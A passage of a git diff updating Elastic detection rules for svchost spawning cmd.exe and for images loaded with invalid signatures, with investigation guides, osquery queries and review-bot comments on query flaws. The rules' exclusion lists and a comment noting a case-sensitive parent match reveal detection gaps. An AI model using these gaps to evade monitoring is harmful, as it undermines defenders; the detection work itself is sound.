start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n\n not process.args :\n (\"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\",\n \"dir\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\LSDeployment\\\\Lspush.exe\",\n \"(x86)\\\\FMAuditOnsite\\\\watchdog.bat\",\n \"?:\\\\ProgramData\\\\chocolatey\\\\bin\\\\choco-upgrade-all.bat\",\n \"Files\\\\Npcap\\\\CheckStatus.bat\") and\n\n /* very noisy pattern - bat or cmd script executed via scheduled tasks */\n not (process.parent.args : \"netsvcs\" and process.args : (\"?:\\\\*.bat\", \"?:\\\\*.cmd\"))\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" 
@@ -63,7 +63,7 @@
 ],
 "risk_score": 21,
 "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json
index 4b391b74b11..aa003b042ed 100644
--- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_207.json
@@ -19,7 +19,7 @@ "process.command_line", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and \nprocess.name.caseless:\"cmd.exe\"\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json index 72118fb8379..786d0871700 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json 
+++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_208.json 
@@ -19,7 +19,7 @@ "process.command_line", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type:windows and event.category:process and event.type:start and process.parent.name:\"svchost.exe\" and \nprocess.name.caseless:\"cmd.exe\"\n", "references": [ "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
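Review bot: The KQL `query` in this section matches the child case-insensitively with `process.name.caseless:"cmd.exe"` but the parent with the plain `process.parent.name:"svchost.exe"`, so if that field is mapped as a case-sensitive keyword an event whose parent is reported as `SVCHOST.EXE` is missed while the same casing on the child would still match; if the mapping provides `process.parent.name.caseless` as it does for `process.name`, `process.parent.name.caseless:"svchost.exe"` would make the two halves consistent. The investigation guide's account step still reads "login events (for example, 4624) to the target host after the registry modification", which looks carried over from a registry-focused guide — this rule fires on process creation, so `after the process creation` would be the accurate reference. The same query and guide text appear in the preceding version file of this rule, whose section starts outside this chunk. These versioned files look like immutable snapshots, so both corrections presumably belong in a new rule version rather than in the files touched here.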
diff --git a/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json b/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json index 30296f71b54..10b0206006e 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fd9484f2-1c56-44ae-8b28-dc1354e3a0e8_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Image Loaded with Invalid Signature", - "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n dll.code_signature.status : (\"errorUntrustedRoot\", \"errorBadDigest\", \"errorUntrustedRoot\") and\n (dll.Ext.relative_file_creation_time \u003c= 500 or dll.Ext.relative_file_name_modify_time \u003c= 500) and\n not startswith~(dll.name, process.name) and\n not dll.path : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\"\n )\n", + "query": "library where host.os.type == \"windows\" and event.action == \"load\" and\n dll.code_signature.status : (\"errorUntrustedRoot\", \"errorBadDigest\", \"errorUntrustedRoot\") and\n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and\n not startswith~(dll.name, process.name) and\n not dll.path : (\n \"?:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\"\n )\n", "related_integrations": [ { "package": "endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json index e620d53f3bf..bb3ad8f9506 100644 
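Review bot: The `dll.code_signature.status` list in the new `query` at `@@ -13,7 +13,7 @@` contains `"errorUntrustedRoot"` twice, so either a third intended status is missing or the duplicate is dead weight; drop the repeated value or replace it with the status that was meant, e.g. `dll.code_signature.status : ("errorUntrustedRoot", "errorBadDigest")` if only two were intended. The commit only changes the encoding of `<=` on this line, so the duplicate predates it, but the line is the one under review. If these versioned rule files are immutable snapshots, the correction presumably belongs in the next version of the rule rather than here.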
--- a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json index b497cb68435..2dd34892153 100644 --- a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_2.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json index c1820a89e24..d989d0e62f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_4.json b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_4.json new file mode 100644 index 00000000000..b08948c850d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fda1d332-5e08-4f27-8a9b-8c802e3292a6_4.json 
